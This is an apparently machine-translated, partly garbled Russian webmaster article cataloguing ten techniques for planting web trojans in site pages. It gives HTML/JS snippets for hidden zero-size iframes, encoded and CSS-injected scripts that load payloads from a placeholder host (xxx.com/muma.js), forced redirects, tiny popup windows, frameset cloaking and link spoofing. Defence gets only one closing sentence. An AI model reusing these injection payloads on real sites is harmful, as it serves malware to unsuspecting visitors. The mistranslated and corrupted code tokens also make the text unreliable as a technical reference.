1: кадра подвесной лошадь
<iframe src = addresswidth = 0 height = 0> </iframe>
Среди них злонамеренные ссылки на веб -сайт могут быть введены по «адресу»
Два: JS -файл подвеса
Пока это файл JS, он может быть злонамеренно изменен, а вредоносный код может быть подвешен. Как правило, код JS, на который ссылаются весь сайт, скорее всего, будет подвешен с троянами. Мы можем проверить левую или нижнюю часть кода JS. Плохим людям нравится скрывать вредоносный код и обычный код со многими пространствами или возвратом каретки, поэтому мы должны проверить, является ли страница кода JS намеренно удлинен и т. Д.
Три: шифрование деформации JS
<Script language = "jscript.encode" src = http: //www.xxx.com/muma.txt> </script>
muma.txt можно изменить на любой суффикс
Четыре: тело висит лошадь
<body onload = "window.location = 'address';"> </body>
Пять: скрывая лошадь невидимой
top.document.body.innerhtml = top.document.body.innerhtml + '/r/n <iframe src = "http://www.xxx.com/muma.htm/"> </iframe>';
Шесть: CSS Hang Horse
тело {
founder-image: url ('javascript: document.write ("<script src = http: //www.xxx.net/muma.js> </script>")')}
Этот метод более безжалостный и трудно найти.
Семь: Джаджа Ханг Лошадь
<Сценарий языка = javascript>
window.open ("адрес", "", "toolbar = no, location = no, directory = no, status = no, menubar = no, scro llbars = no, width = 1, height = 1");
</script>
Восемь: маскировка картины
<html>
<iframe src = "博题题题题" высота = 0 width = 0> </iframe>
<img src = "Адрес изображения"> </center>
</html>
Девять: замаскированный звонок
<Frameset Rows = "444,0" Cols = "*">
<frame src = "open websage" crameborder = "no" scolling = "auto" noresize marginwidth = "0" margingheight = "0">
<Frame src = "net Horse Address" frameborder = "no" scrolling = "no" noresize marginwidth = "0" margingheight = "0">
</frameset>
Десять: продвинутый обман
<a href = "http://www.163.com (сбил с толку адрес соединения, отобразите этот адрес -точки по адресу троянского адреса)" onmouseover = "www_163_com (); return true;"> Что отобразить на странице </a>
<Script language = "javascript">
Функция www_163_com ()
{
var url = "博题题题题题题";
open (url, "newwindow", "toolbar = no, location = no, directory = no, status = no, menubar = no, scrollbars = no, stogizable = no, copyhistory = yes, width = 800, высота = 600, слева = 10, вершина = 10");
}
</Script>
Как обнаружить вышеупомянутое поведение? Если несколько страниц имеют коды лошадей, то требуются инструменты замены партии. Рекомендуется использовать его.
Некоторые загрузки серверного канала нового сайта Webmaster (больше программного обеспечения можно загрузить по адресу s.vevb.com)